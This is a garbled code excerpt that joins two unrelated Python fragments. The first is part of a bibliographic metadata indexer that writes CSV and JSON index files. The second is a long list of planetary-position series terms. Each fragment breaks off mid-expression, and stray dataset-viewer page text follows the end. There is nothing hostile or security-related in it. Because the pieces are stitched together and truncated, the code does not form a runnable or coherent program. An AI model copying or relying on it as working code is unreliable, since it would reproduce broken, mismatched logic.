index[y] = "; ".join(list_ar)
self.ar_index.append(index)
else:
row = dict()
row["meta"] = ""
row["author"] = ""
row["editor"] = ""
row["publisher"] = ""
self.ar_index.append(row)
# RE
self.re_index = list()
if self.remeta:
for x in self.remeta:
r = dict()
r["br"] = x
r["re"] = str(self.remeta[x][0])
self.re_index.append(r)
else:
row = dict()
row["br"] = ""
row["re"] = ""
self.re_index.append(row)
# VI
self.VolIss = dict()
if self.vvi:
for x in self.vvi:
if self.vvi[x]["issue"]:
for iss in self.vvi[x]["issue"]:
if "wannabe" in self.vvi[x]["issue"][iss]["id"]:
for i in self.brmeta:
if self.vvi[x]["issue"][iss]["id"] in self.brmeta[i]["others"]:
self.vvi[x]["issue"][iss]["id"] = str(i)
if self.vvi[x]["volume"]:
for vol in self.vvi[x]["volume"]:
if "wannabe" in self.vvi[x]["volume"][vol]["id"]:
for i in self.brmeta:
if self.vvi[x]["volume"][vol]["id"] in self.brmeta[i]["others"]:
self.vvi[x]["volume"][vol]["id"] = str(i)
if self.vvi[x]["volume"][vol]["issue"]:
for iss in self.vvi[x]["volume"][vol]["issue"]:
if "wannabe" in self.vvi[x]["volume"][vol]["issue"][iss]["id"]:
for i in self.brmeta:
if self.vvi[x]["volume"][vol]["issue"][iss]["id"] in self.brmeta[i]["others"]:
self.vvi[x]["volume"][vol]["issue"][iss]["id"] = str(i)
if "wannabe" in x:
for i in self.brmeta:
if x in self.brmeta[i]["others"]:
self.VolIss[i] = self.vvi[x]
else:
self.VolIss[x] = self.vvi[x]
if self.filename:
ra_path = os.path.join(path_index, "index_id_ra.csv")
self.write_csv(ra_path, self.index_id_ra)
br_path = os.path.join(path_index, "index_id_br.csv")
self.write_csv(br_path, self.index_id_br)
ar_path = os.path.join(path_index, "index_ar.csv")
self.write_csv(ar_path, self.ar_index)
re_path = os.path.join(path_index, "index_re.csv")
self.write_csv(re_path, self.re_index)
vvi_file = os.path.join(path_index, "index_vi.json")
if not os.path.exists(os.path.dirname(vvi_file)):
os.makedirs(os.path.dirname(vvi_file))
with open(vvi_file, 'w') as fp:
json.dump(self.VolIss, fp)
if self.log:
log_file = os.path.join(path_index + "log.json")
with open(log_file, 'w') as lf:
json.dump(self.log, lf)
if self.data:
name = self.filename + ".csv"
data_file = os.path.join(path_csv, name)
self.write_csv(data_file, self.data)
def id_worker(self, col_name, name, idslist, ra_ent=False, br_ent=False, vvi_ent=False, publ_entity=False):
if not ra_ent:
id_dict = self.idbr
entity_dict = self.brdict
idslist, metaval = self.clean_id_list(idslist)
else:
id_dict = self.idra
entity_dict = self.radict
idslist, metaval = self.clean_id_list(idslist, br=False)
# there's meta
if metaval:
# meta already in entity_dict (no care about conflicts, we have a meta specified)
if metaval in entity_dict:
self.find_update_other_ID(idslist, metaval, entity_dict, name)
for identifier in idslist:
if identifier not in entity_dict[metaval]["ids"]:
entity_dict[metaval]["ids"].append(identifier)
if identifier not in id_dict:
count = self._add_number(self.id_info_path)
id_dict[identifier] = self.prefix + str(count)
if not entity_dict[metaval]["title"] and name:
entity_dict[metaval]["title"] = name
else:
found_meta_ts = None
if ra_ent:
found_meta_ts = self.finder.retrieve_ra_from_meta(metaval, | |
* mu.cost(1.25519718278 + 3894.18182954220 * x)
L1 += 0.00000019455 * mu.cost(2.53112676345 + 4399.99435688900 * x)
L1 += 0.00000015000 * mu.cost(1.03464802434 + 2288.34404351140 * x)
L1 += 0.00000020029 * mu.cost(4.73119428749 + 4690.47983635860 * x)
L1 += 0.00000015381 * mu.cost(2.47009470350 + 4535.05943692440 * x)
L1 += 0.00000019964 * mu.cost(5.78652958398 + 7079.37385680780 * x)
L1 += 0.00000015307 * mu.cost(2.26515985343 + 3723.50895892300 * x)
L1 += 0.00000014705 * mu.cost(3.36979890389 + 6681.24210705180 * x)
L1 += 0.00000013535 * mu.cost(2.12334410410 + 5486.77784317500 * x)
L1 += 0.00000012950 * mu.cost(5.61929676688 + 10025.36039844840 * x)
L1 += 0.00000012682 * mu.cost(2.95022113262 + 3496.03282613400 * x)
L1 += 0.00000013644 * mu.cost(1.97739547259 + 5614.72937620960 * x)
L1 += 0.00000013013 * mu.cost(1.51424752315 + 5628.95647021120 * x)
L1 += 0.00000014705 * mu.cost(1.33902715586 + 6681.20759974740 * x)
L1 += 0.00000011353 * mu.cost(6.23438193885 + 135.06508003540 * x)
L1 += 0.00000013275 * mu.cost(3.42243595774 + 5621.84292321040 * x)
L1 += 0.00000010867 * mu.cost(5.28184140482 + 2818.03500860600 * x)
L1 += 0.00000011850 * mu.cost(3.12701832949 + 426.59819087600 * x)
L1 += 0.00000010472 * mu.cost(2.73581537999 + 2787.04302385740 * x)
L1 += 0.00000011132 * mu.cost(5.84178807242 + 2803.80791460440 * x)
L1 += 0.00000011764 * mu.cost(2.58551521265 + 8432.76438481560 * x)
L1 += 0.00000011854 * mu.cost(5.47630686910 + 3553.91152213780 * x)
L1 += 0.00000008490 * mu.cost(1.91378007528 + 11773.37681151540 * x)
L1 += 0.00000009708 * mu.cost(4.52957217749 + 6489.77658728800 * x)
L1 += 0.00000008562 * mu.cost(3.16141186861 + 162.46663613220 * x)
L1 += 0.00000010958 * mu.cost(4.15771850822 + 2388.89402044920 * x)
L1 += 0.00000008133 * mu.cost(1.61295625304 + 2957.71589447660 * x)
L1 += 0.00000008840 * mu.cost(4.23294294197 + 7477.52286021600 * x)
L1 += 0.00000008034 * mu.cost(5.69983564288 + 6041.32756708560 * x)
L1 += 0.00000008344 * mu.cost(2.18273563186 + 23.87843774780 * x)
L1 += 0.00000007696 * mu.cost(5.71877332978 + 9623.68827669120 * x)
L1 += 0.00000008695 * mu.cost(4.43542512603 + 5092.15195811580 * x)
L1 += 0.00000008434 * mu.cost(3.16292250873 + 3347.72597370060 * x)
L1 += 0.00000006664 * mu.cost(5.07517838003 + 8031.09226305840 * x)
L1 += 0.00000008650 * mu.cost(4.33256981793 + 3339.63210563160 * x)
L1 += 0.00000007372 * mu.cost(6.17831593269 + 3583.34103067380 * x)
L1 += 0.00000005726 * mu.cost(3.68120120299 + 8429.24126646660 * x)
L1 += 0.00000006186 * mu.cost(3.54165967734 + 692.15760122680 * x)
L1 += 0.00000005438 * mu.cost(1.05129689580 + 4933.20844033260 * x)
L1 += 0.00000006108 * mu.cost(1.66240879939 + 6525.80445396540 * x)
L1 += 0.00000005154 * mu.cost(1.14703246368 + 28.44918746780 * x)
L1 += 0.00000004850 * mu.cost(5.29254832907 + 6681.29216370240 * x)
L1 += 0.00000005467 * mu.cost(6.12511022569 + 2487.41604494780 * x)
L1 += 0.00000004866 * mu.cost(3.10475368803 + 5.52292430740 * x)
L1 += 0.00000006360 * mu.cost(2.11896608283 + 5884.92684658320 * x)
L1 += 0.00000005223 * mu.cost(0.37446264120 + 12832.75874170460 * x)
L1 += 0.00000004710 * mu.cost(0.23326120326 + 36.02786667740 * x)
L1 += 0.00000004954 * mu.cost(2.44806818502 + 5099.26550511660 * x)
L1 += 0.00000004861 * mu.cost(5.60505298870 + 6467.92575796160 * x)
L1 += 0.00000004706 * mu.cost(0.02998416568 + 7210.91581849420 * x)
L1 += 0.00000004845 * mu.cost(5.70115105957 + 6681.15754309680 * x)
L1 += 0.00000005496 * mu.cost(2.01006612503 + 522.57741809380 * x)
L1 += 0.00000004964 * mu.cost(1.51006845561 + 1744.42598441520 * x)
L1 += 0.00000004443 * mu.cost(0.31208413867 + 10018.31416175040 * x)
L1 += 0.00000005381 * mu.cost(0.18359380473 + 2942.46342329160 * x)
L1 += 0.00000004075 * mu.cost(3.95582108330 + 3.88133535800 * x)
L1 += 0.00000005462 * mu.cost(0.19274227117 + 7632.94325965020 * x)
L1 += 0.00000004110 * mu.cost(1.59535768711 + 7234.79425624200 * x)
L1 += 0.00000004287 * mu.cost(2.87635993968 + 2810.92146160520 * x)
L1 += 0.00000005276 * mu.cost(2.22638595594 + 3127.31333126180 * x)
L1 += 0.00000004450 * mu.cost(4.17005729081 + 2906.90068882300 * x)
L1 += 0.00000005144 * mu.cost(5.66878565669 + 23384.28698689860 * x)
L1 += 0.00000003844 * mu.cost(2.26442183160 + 2699.73481931760 * x)
L1 += 0.00000003514 * mu.cost(1.76463961051 + 1758.65307841680 * x)
L1 += 0.00000003351 * mu.cost(2.66194137496 + 4929.68532198360 * x)
L1 += 0.00000004299 * mu.cost(4.43057446968 + 640.87760738220 * x)
L1 += 0.00000003140 * mu.cost(1.75866226873 + 9595.23908922340 * x)
L1 += 0.00000003716 * mu.cost(2.91969220147 + 15643.68020330980 * x)
L1 += 0.00000003249 * mu.cost(6.13937134379 + 10419.98628350760 * x)
L1 += 0.00000003077 * mu.cost(2.56115174488 + 7064.12138562280 * x)
L1 += 0.00000003208 * mu.cost(2.32519453080 + 5085.03841111500 * x)
L1 += 0.00000002930 * mu.cost(1.27797225349 + 574.34479833480 * x)
L1 += 0.00000002771 * mu.cost(1.75664216142 + 639.89728631400 * x)
L1 += 0.00000003325 * mu.cost(2.58945297384 + 2118.76386037840 * x)
L1 += 0.00000003187 * mu.cost(2.86646751510 + 7740.60678358880 * x)
L1 += 0.00000002780 * mu.cost(0.43157089331 + 5828.02847164760 * x)
L1 += 0.00000002824 * mu.cost(0.98500544471 + 3191.04922956520 * x)
L1 += 0.00000003016 * mu.cost(1.86555882509 + 7.04623669800 * x)
L1 += 0.00000003364 * mu.cost(1.52847138842 + 6674.11130639880 * x)
L1 += 0.00000002672 * mu.cost(3.70855172347 + 10021.85453375160 * x)
L1 += 0.00000002636 * mu.cost(3.11790581052 + 6836.64525283380 * x)
L1 += 0.00000002672 * mu.cost(1.67778079449 + 10021.82002644720 * x)
L1 += 0.00000002563 * mu.cost(3.77294986894 + 2921.12778282460 * x)
L1 += 0.00000002509 * mu.cost(0.30454165124 + 3475.67750673520 * x)
L1 += 0.00000002400 * mu.cost(0.96972421975 + 3319.83703120740 * x)
L1 += 0.00000002262 * mu.cost(2.81394314950 + 7875.67186362420 * x)
L1 += 0.00000002395 * mu.cost(2.96002707485 + 6682.20517446780 * x)
L1 += 0.00000002210 * mu.cost(0.61263930586 + 10973.55568635000 * x)
L1 += 0.00000002248 * mu.cost(4.12382007742 + 59.37386191360 * x)
L1 += 0.00000002426 * mu.cost(5.91508357946 + 5331.35744374080 * x)
L1 += 0.00000002158 * mu.cost(2.17583545077 + 15113.98923821520 * x)
L1 += 0.00000001941 * mu.cost(5.47668312685 + 11371.70468975820 * x)
L1 += 0.00000001903 * mu.cost(5.11165653855 + 1066.49547719000 * x)
L1 += 0.00000002370 * mu.cost(3.87889340214 + 3355.86489788480 * x)
L1 += 0.00000002299 * mu.cost(1.15914205086 + 3320.25710730100 * x)
L1 += 0.00000001944 * mu.cost(5.89081872133 + 6894.52394883760 * x)
L1 += 0.00000001843 * mu.cost(3.07643314617 + 3325.35995551480 * x)
L1 += 0.00000001809 * mu.cost(4.97905218276 + 1648.44675719740 * x)
L1 += 0.00000002136 * mu.cost(1.91364787635 + 8969.56889691100 * x)
L1 += 0.00000002099 * mu.cost(3.00410255642 + 6254.62666252360 * x)
L1 += 0.00000001915 * mu.cost(3.55907431740 + 3767.21061757580 * x)
L1 += 0.00000001991 * mu.cost(5.37274107053 + 206.18554843720 * x)
L1 += 0.00000001685 * mu.cost(5.49701299817 + 266.60704172180 * x)
L1 += 0.00000001646 * mu.cost(1.31923405548 + 3264.34635542420 * x)
L1 += 0.00000001732 * mu.cost(1.81361103995 + 536.80451209540 * x)
L1 += 0.00000001723 * mu.cost(3.25900379342 + 7903.07341972100 * x)
L1 += 0.00000001564 * mu.cost(5.75428852012 + 3360.96774609859 * x)
L1 += 0.00000001589 * mu.cost(1.73273563259 + 3134.42687826260 * x)
L1 += 0.00000001690 * mu.cost(2.43213510013 + 3120.19978426100 * x)
L1 += 0.00000001549 * mu.cost(1.54016426558 + 8425.65083781480 * x)
L1 += 0.00000001536 * mu.cost(5.88431472627 + 20.77539549240 * x)
L1 += 0.00000001460 * mu.cost(4.89733072879 + 9830.38901398780 * x)
L1 += 0.00000002023 * mu.cost(5.94808387002 + 13365.97282514820 * x)
L1 += 0.00000001991 * mu.cost(3.11613326265 + 3361.38782219220 * x)
L1 += 0.00000001401 * mu.cost(2.24482184868 + 3344.20285535160 * x)
L1 += 0.00000001365 * mu.cost(4.58006320751 + 10818.13528691580 * x)
L1 += 0.00000001392 * mu.cost(5.48931017516 + 170.67287061920 * x)
L1 += 0.00000001360 * mu.cost(3.07974035205 + 6127.65545055720 * x)
L1 += 0.00000001345 * mu.cost(1.18653158091 + 14584.29827312060 * x)
L1 += 0.00000001717 * mu.cost(5.62501515015 + 6158.64743530580 * x)
L1 += 0.00000001408 * mu.cost(1.82072980335 + 3337.02199804800 * x)
L1 += 0.00000001736 * mu.cost(2.01921900546 + 10575.40668294180 * x)
L1 += 0.00000001402 * mu.cost(4.50079374387 + 5729.50644714900 * x)
L1 += 0.00000001266 * mu.cost(5.91088435118 + 9808.53818466140 * x)
L1 += 0.00000001433 * mu.cost(6.05024653324 + 12964.30070339100 * x)
L1 += 0.00000001223 * mu.cost(0.82796258263 + 419.48464387520 * x)
L1 += 0.00000001393 * mu.cost(1.05117949107 + 6438.49624942560 * x)
L1 += 0.00000001272 * mu.cost(1.50116723856 + 8439.87793181640 * x)
L1 += 0.00000001143 * mu.cost(4.89747373731 + 220.41264243880 * x)
L1 += 0.00000001183 * mu.cost(3.52587190041 + 6688.33840040040 * x)
L1 += 0.00000001132 * mu.cost(6.19236255633 + 6144.42034130420 * x)
L1 += 0.00000001154 * mu.cost(2.23058485970 + 8955.34180290940 * x)
L1 += 0.00000001129 * mu.cost(3.44264300692 + 10177.25767953360 * x)
L1 += 0.00000001152 * mu.cost(5.29913300616 + 27.40155609680 * x)
L1 += 0.00000001274 * mu.cost(4.58421238440 + 6247.51311552280 * x)
L1 += 0.00000001093 * mu.cost(2.82623332360 + 4569.57454002200 * x)
L1 += 0.00000001303 * mu.cost(0.44350560735 + 87.30820453981 * x)
L1 += 0.00000001335 * mu.cost(2.14204457730 + 11243.68584642080 * x)
L1 += 0.00000001102 * mu.cost(1.96260837539 + 6298.32832117640 * x)
L1 += 0.00000001066 * mu.cost(2.89865914321 + 10404.73381232260 * x)
L1 += 0.00000001027 * mu.cost(4.79269049654 + 3914.95722503460 * x)
L1 += 0.00000001015 * mu.cost(0.22847818730 + 3230.40610548040 * x)
L1 += 0.00000001041 * mu.cost(3.73274497451 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.